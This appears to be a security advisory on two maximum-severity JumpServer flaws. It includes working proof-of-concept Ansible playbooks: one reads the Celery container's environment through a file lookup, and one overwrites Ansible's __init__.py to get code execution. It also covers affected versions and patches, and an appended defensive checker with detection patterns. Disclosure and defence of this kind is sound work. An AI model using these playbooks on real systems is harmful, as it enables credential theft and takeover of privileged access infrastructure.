CVE-2024-40628 & CVE-2024-40629: Two Maximum Severity Flaws in JumpServer

CVE-2024-40628 and CVE-2024-40629

JumpServer, a widely used open-source privileged access management (PAM) tool, has disclosed two critical vulnerabilities that could allow attackers to gain unauthorized access to sensitive systems and data. The vulnerabilities, identified as CVE-2024-40628 and CVE-2024-40629, both carry a CVSS score of 10, the highest possible severity rating.

Exploiting the Flaws

CVE-2024-40628 enables attackers to read arbitrary files within the JumpServer Celery container, potentially exposing sensitive information such as passwords, SSH keys, and database credentials. This vulnerability can be exploited by a low-privileged user with access to the Job Center feature.

Reproduction Steps:

  1. Open Workbench > Job > Template section, create a malicious playbook template with the following content:

     - hosts: all
       tasks:
         - name: read file from local host = celery using file lookup plugin
           ansible.builtin.debug:
             msg: "{{ lookup('ansible.builtin.file', '/proc/self/environ') }}"

  2. Open Workbench > Job > Job list section, create a new job with the playbook template created above.
  3. Run the job.

CVE-2024-40629 is even more severe, allowing attackers to write arbitrary files and execute code within the Celery container. This could lead to a complete compromise of the JumpServer instance and the systems it manages. Like CVE-2024-40628, this vulnerability can also be exploited by a low-privileged user with access to the Job Center.

Reproduction Steps:

  1. Open Workbench > Job > Template section, create a malicious playbook template with the following content:

     - hosts: all
       tasks:
         - name: create python file on remote host that executes a command
           shell: |
             echo 'from ansible.release import __version__, __author__
             __import__("os").system("id > /tmp/pwnd")' > /tmp/rce
         - name: write that file at a known location that gets reloaded at the next ansible execution
           fetch:
             src: /tmp/rce
             dest: /opt/py3/lib/python3.11/site-packages/ansible/__init__.py
             flat: true

  2. Open Workbench > Job > Job list section, create a new job with the playbook template created above.
  3. Run the job, then run any other playbook and the command will be executed.

Impact on Organizations

If exploited, these vulnerabilities could have devastating consequences for organizations that rely on JumpServer to manage privileged access to their critical systems. Attackers could steal sensitive data, disrupt operations, or even launch further attacks on other systems within the organization.

Who is Affected?

All JumpServer versions from v3.0.0 to v3.10.11 are vulnerable to both CVE-2024-40628 and CVE-2024-40629.

Mitigating the Risk

JumpServer has released patched versions v3.10.12 and v4.0.0 that address these vulnerabilities. All organizations using JumpServer are strongly urged to update to one of these patched versions immediately.
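As an added example (not part of the original post and not JumpServer's own code), the Python below checks a release tag against the affected range stated above and audits a Job Center playbook template for the two patterns the reproduction steps rely on: a local lookup plugin that reads data on the Celery host, and a fetch whose destination lands inside the container's Python tree. The sample template, the path prefixes and the regex heuristics are constructed assumptions for illustration.

```python
import re

# Affected range from the advisory: v3.0.0 through v3.10.11 (fixed in v3.10.12 / v4.0.0).
AFFECTED_MIN, AFFECTED_MAX = (3, 0, 0), (3, 10, 11)

# Constructed heuristics mirroring the two reproduction playbooks: a lookup plugin
# that reads local files/pipes/env on the Celery host, and a fetch/copy whose dest
# lands in the container's Python tree or another system path.
LOOKUP_RE = re.compile(r"lookup\(\s*['\"](?:ansible\.builtin\.)?(file|pipe|env|lines)['\"]")
DEST_RE = re.compile(r"^\s*dest:\s*['\"]?(/\S+)")
SENSITIVE_PREFIXES = ("/opt/py3/", "/usr/lib/python", "/usr/local/lib/python", "/etc/", "/root/")

def parse_version(tag: str) -> tuple:
    """'v3.10.11' -> (3, 10, 11); components beyond the third are ignored."""
    return tuple(int(p) for p in tag.lstrip("v").split(".")[:3])

def is_affected(tag: str) -> bool:
    """True if a JumpServer release tag falls inside the vulnerable range."""
    return AFFECTED_MIN <= parse_version(tag) <= AFFECTED_MAX

def audit_playbook(text: str) -> list:
    """Return (line_no, reason) findings for a Job Center playbook template."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        if LOOKUP_RE.search(line):
            findings.append((no, "lookup plugin reads data on the Celery host"))
        m = DEST_RE.match(line)
        if m and m.group(1).startswith(SENSITIVE_PREFIXES):
            findings.append((no, "dest writes into a system path: " + m.group(1)))
    return findings

# Constructed sample template: a local file lookup, a fetch into the container's
# site-packages directory, and a benign fetch into a job workspace.
SAMPLE_TEMPLATE = """\
- hosts: all
  tasks:
    - name: read a local file through the file lookup plugin
      ansible.builtin.debug:
        msg: "{{ lookup('ansible.builtin.file', '/etc/hostname') }}"
    - name: fetch into the container's Python tree
      fetch:
        src: /tmp/marker
        dest: /opt/py3/lib/python3.11/site-packages/ansible/__init__.py
        flat: true
    - name: benign fetch into the job workspace
      fetch:
        src: /tmp/report.txt
        dest: /data/jobs/report.txt
"""
```

Running audit_playbook on the sample flags lines 5 and 9 and leaves the workspace fetch alone; a review hook on template creation could refuse any template with findings until an administrator has approved it.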
